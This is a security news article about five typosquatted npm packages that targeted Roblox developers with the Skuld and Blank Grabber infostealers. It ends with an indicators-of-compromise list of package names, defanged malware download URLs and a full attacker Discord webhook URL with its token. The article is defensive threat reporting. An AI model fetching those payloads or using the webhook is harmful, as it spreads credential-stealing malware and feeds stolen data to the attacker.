Researchers found five malicious npm packages targeting Roblox developers, stealing credentials and personal data. These packages, including autoadv, ro.dll, node-dlls, and two rolimons-api versions, mimic legitimate modules commonly used by the Roblox community.
Malicious npm Packages
As of Q2 2024, Roblox had 79.5 million daily active users, with 58% aged 13 or older, and 2.6 million developers. Its popularity makes it a prime target for cybercriminals seeking sensitive information or unauthorized access to accounts.
The threat actor released a fake package, node-dlls, typosquatting the popular node-dll package, downloaded over 35,800 times. Similarly, the rolimons-api@1.1.0 and rolimons-api@1.1.2 packages mimicked Rolimon’s API Module, a tool widely used by Roblox developers.
These malicious packages, designed to exploit developers’ trust in familiar names, contained obfuscated code that downloaded and executed Skuld infostealer and Blank Grabber malware.
The Skuld infostealer, written in Go, is designed to steal sensitive data from Windows systems, including information from Discord, Chromium-based browsers, Firefox, and cryptocurrency wallets.
Blank Grabber, a Python-based malware, also steals data from affected Windows computers. Its user-friendly interface allows attackers to change the malware’s behavior, bypass User Account Control (UAC), or disable Windows Defender.
The attacker receives stolen data via Telegram or Discord webhooks. The malicious npm packages contained obfuscated JavaScript code designed to download and execute harmful files from external sources.
The attacker added the downloadAndRun function to the malicious npm packages, which enabled the downloading and execution of malware using PowerShell commands. This allowed the attacker to silently execute malicious code on the victim’s computer without triggering immediate alarms, effectively creating a backdoor.
Through this backdoor, the attacker deployed two types of malware: Skuld infostealer and Blank Grabber. These malware variants were designed to steal sensitive information, such as login credentials, bank account details, and personal files, all without the victim’s knowledge.
In early 2024, Socket revealed another exploit involving a malicious package pretending to be the official noblox.js and noblox.js-server. Researchers noted that these repeated attacks highlight an ongoing threat, as attackers target the Roblox platform’s popularity and developers’ use of open-source code. To stay safe, it’s crucial to carefully verify package names, review third-party code, and use security tools to detect harmful packages.
Indicators Of Compromise (IOCs)
Malicious Packages:
- node-dlls@1.0.0
- ro.dll@1.0.0
- autoadv@1.0.0
- rolimons-api@1.1.0
- rolimons-api@1.1.2
Malicious URLs:
- hxxps://github[.]com/zvydev/code/raw/main/RobloxPlayerLauncher.exe
- hxxps://github[.]com/zvydev/code/raw/main/cmd.exe
- hxxps://github[.]com/zvydev/code
Discord Webhook:
hxxps://discord[.]com/api/webhooks/1298438839865577564/LcdRm0rKPE01ApFPl9RQHGqhcuExeiqKGpghrB8Lv3iKniiyEa0mVBhFySte_oBx7wyQ
Follow Us on: Twitter, Instagram, Facebook to get the latest security news!
Leave A Comment